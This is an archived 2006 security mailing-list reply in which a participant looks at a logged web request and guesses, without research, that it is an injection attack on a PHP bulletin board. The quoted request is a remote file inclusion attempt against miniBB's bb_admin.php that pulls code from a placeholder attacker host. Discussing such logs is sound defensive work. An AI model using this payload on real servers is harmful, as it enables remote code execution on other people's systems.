funsec mailing list archives

Re: interesting attack

From: Technocrat <dj.technocrat.listmail () gmail com>
Date: Wed, 19 Apr 2006 12:33:05 -0500

On 4/14/06, Peter Kosinar <goober () nuf ksp sk> wrote:

GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1


Without researching it, I would guess that it is a command/script
injection attack in a PHP based BB system. Looks like she is using a
poor file handler for the injection. Again, this is without research.

-Technocrat

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Current thread:

interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
  - Re: interesting attack Technocrat (Apr 19)
    - Re: interesting attack Valdis . Kletnieks (Apr 19)
    - Re: interesting attack Brian Loe (Apr 19)
    - Re: interesting attack Valdis . Kletnieks (Apr 19)
    - Re: interesting attack Brian Loe (Apr 19)
    - Re: interesting attack Peter Kosinar (Apr 19)
    - Re: interesting attack Technocrat (Apr 19)